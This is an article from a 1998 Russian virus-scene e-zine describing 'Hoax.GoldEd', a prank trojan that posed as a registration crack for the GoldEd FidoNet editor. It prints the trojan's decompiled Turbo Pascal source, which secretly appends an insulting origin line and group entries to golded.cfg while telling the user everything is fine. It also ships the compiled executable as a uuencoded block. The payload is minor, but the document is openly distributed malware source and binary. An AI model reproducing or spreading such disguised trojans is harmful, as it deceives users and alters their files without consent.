Magazine "Duke's Virus Labs"          Number 01          File 012
 ▄▄▄▄▄▄  ▄▄▄▄▄    ▄       ▄  ▄▄▄                  ▄▄▄▄▄   ▄▄▄▄▄▄
          █  ▀█▄  █       █   █          █  █       █
 ▀▀▀▀▀▀   █    █  ▀█     █▀   █        ▀▀█▀▀█▀▀     █     ▀▀▀▀▀▀
 ▄▄▄▄▄▄   █    █   ██   ██    █        ▄▄█▄▄█▄▄     █     ▄▄▄▄▄▄
          █  ▄█▀    █▄ ▄█     █    ▄█    █  █       █
 ▀▀▀▀▀▀  ▀▀▀▀▀       ▀▀▀     ▀▀▀▀▀▀▀              ▀▀▀▀▀   ▀▀▀▀▀▀

                        Hoax.GoldEd


Имя       : Hoax.GoldEd
Автор     : неизвестен
Тип       : trojan (троянец)
Длина     : 4400
Язык      : Turbo Pascal 7.0
Упаковщик : нет
Поражает  : golded.cfg :))
Опасность : минимальная ;)

Данный троянец был обнаружен мной на диске "Хакеру-2" среди взло-
мок к различного рода программам в процессе тестирования этих са-
мых взломок на работоспособность. Он выдает себя  за  регистратор
программы GoldEd. Это скорее даже  не  троянец,  а  глупая  шутка
"Hoax". Троянец назван  мной  Hoax.GoldEd.  Представляю  вам  его
source - "дипаскалировано" (т.е. конвертировано EXE to PAS)  лич-
но мной 13.07.98.

===== Cut here =====
program Trojan_GoldEd;
uses crt;
var x:text;
begin
textcolor(3);
writeln('Все в порядке, теперь можешь смело заходить обратно '+
                                                     'в голдед');
writeln('и попробовать написать чего-нить в эху 308.SLOPS...');
writeln('Результат появится где-нить через парочку дней.');
assign(x,'golded.cfg');reset(x);
writeln(x,'');
writeln(x,'group !689.FLAME');
writeln(x,'member 689.FLAME');
writeln(x,'origin Я какашка, я скотина, я мудозвон! ');
writeln(x,'ENDGROUP');
close(x);
end.
===== Cut here =====

   Вся  "работа"  троянца заключается в записи в файл  golded.cfg
текста:

   group !689.FLAME
   member 689.FLAME
   origin {здесь вырезано цензурой, оригинал читайте выше :( }
   ENDGROUP

   От фидошников я так и не добился толкового ответа на вопрос  о
причинах вражды между 689.FLAME и 308.SLOPS  или  о  последствиях
работы с "подправленным" GoldEd'ом. Если вы знпете ответ на  этот
вопрос, прошу написать.
   Далее  привожу  UUE-код,  содержащий  откомпилированный   файл
GOLD.EXE (для тех, у кого нет  паскаля  или лень с ним возиться).
Не правда ли, исходник намного меньше... ;)

                                  Duke/SMF

===== Cut here =====
            Имя исходного файла : GOLD.EXE
                         Размер : 4400 (5Kb)
                  Дата создания : 01-Янв-98 14:28:20
               Дата кодирования : 25-Июл-98 21:56:06
                 Размер UU-кода : 7Kb
              Количество секций : 1
     Число строк в одной секции : 98


section 1 of file gold.exe  < uuencode by Dos Navigator >

filetime 606172042
begin 644 gold.exe
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
MOU(`'@>YL@,KS]'I,\#\\ZO#````````````````````````````````````
M`````/__````````````````````````````````````````````````````
C````````$$```*``L`"X```"``T*````````````````````
`
end
sum -r/size 52198/6089 section (from "begin" to "end")
sum -r/size 18253/4400 entire input file
===== Cut here =====
------------------------<end of file>----------------------------
